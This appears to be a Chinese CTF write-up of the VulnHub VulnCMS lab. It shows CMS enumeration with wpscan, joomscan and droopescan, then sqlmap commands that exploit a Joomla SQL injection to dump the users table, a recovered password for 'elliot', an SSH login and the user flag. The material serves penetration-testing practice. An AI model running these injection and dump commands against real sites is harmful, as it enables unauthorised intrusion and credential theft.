靶机描述:
This box is all about CMS as its name suggests. You need to enumerate the box, find the CMS, and exploit in order to gain access to other and finally get the user and root flag.
Hint: Proceed in the given order :P
顾名思义,这个盒子是关于CMS的。您需要枚举该框架,找到CMS,并利用它来获得访问权限,并最终获得用户和根flag。
提示:按照给定的顺序进行
靶机下载地址:https://download.vulnhub.com/vulncms/VulnCMS.ova
本靶机使用Vmware Workstation搭建,与kali攻击机共处同一网段,IP自动获取,目前未知。
1、主机存活探测
arp-scan -l
扫描端号
其中发现
22端口提供了SSH服务,80端口为普通的博客页面,5000端口为WordPress,8081端口为Joomla,9001端口为Drupal。尝试访问web页面。
同时还可以看到8081的drupal CMS是有网址的,fsociety.web,将其加入到自己的hosts文件中。
扫描目录未发现有价值漏洞,本靶机标题即为VulnCMS,那么突破点必定在这些CMS上。
使用wpscan扫描该靶机的WordPress CMS获取其版本号。
wpscan --url http://192.168.13.142:5000 --enumerate vt,vp,tt,u
虽然没有获取到其他有利用价值的信息,但是获取到版本号为WordPress 5.7.2。
接下来对8081的Joomla进行扫描,这里使用joomscan工具。
joomscan -u http://192.168.13.142:8081
扫描到许多目录和可能存在的CVE漏洞,版本号为以及后台地址/administrator/
这里先不进行漏洞利用,继续把剩下的9001Drupal扫描完,这里使用droopescan工具。
droopescan scan drupal -u http://192.168.13.142:9001 -t 32
只扫描到了一个drupal的版本号信息,但是可以通过searchsploit来查找对应版本的漏洞信息。
所以现在收集到的版本分别为:
| URL | CMS | 版本 |
| 192.168.13.142:5000 | Wordpress | 5.7.2 |
| 192.168.13.142:8081 | Joomla | 3.4.3 |
| 192.168.13.142:9001 | Drupal | 7.54 |
搜索相关的
一番测试之后,最终找到了以下漏洞。
WordPress的/wp-login下存在RCE漏洞,虽然可以执行命令,但是尝试了许多反弹payload的方式都不可以反弹shell。
无果只能放弃,转战其他CMS,接下来就是Joomla了,工具扫描的结果显示存在SQL注入,将exp存放到当前文件夹。
其中该网页源码此处即存在SQL注入漏洞的点。
接下来尝试使用SQLmap进行SQL注入。
sqlmap -u "http://fsociety.web:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=*" --dbs --batch
爆到了joomla_db库,继续往下查找
sqlmap -u "http://fsociety.web:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=*" -D joomla_db --tables --batch
爆到了67张表,其中值得关注的有一个hs23w_users,继续爆破。
sqlmap -u "http://fsociety.web:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=*" -D joomla_db -T hs23w_users --columns --batch
查看数据,这里我截取了可能会有用的几列数据。
sqlmap -u "http://fsociety.web:8081/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=*" -D joomla_db -T hs23w_users -C id,name,email,password,username --batch --dump
这里密码字段进行了加密,解密无果,但是在邮箱字段发现了5T3e!_M0un7i@N,可能为密码,尝试登录后台发现可以登录,但是会提示Invalid Token。
账户:elliot
密码:5T3e!_M0un7i@N
那么尝试SSH连接。
ssh elliot@192.168.13.142
登录成功,并且在此目录下找到user.txt,9046628504775551,但是为一个普通权限用户,需要进行提权操作。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
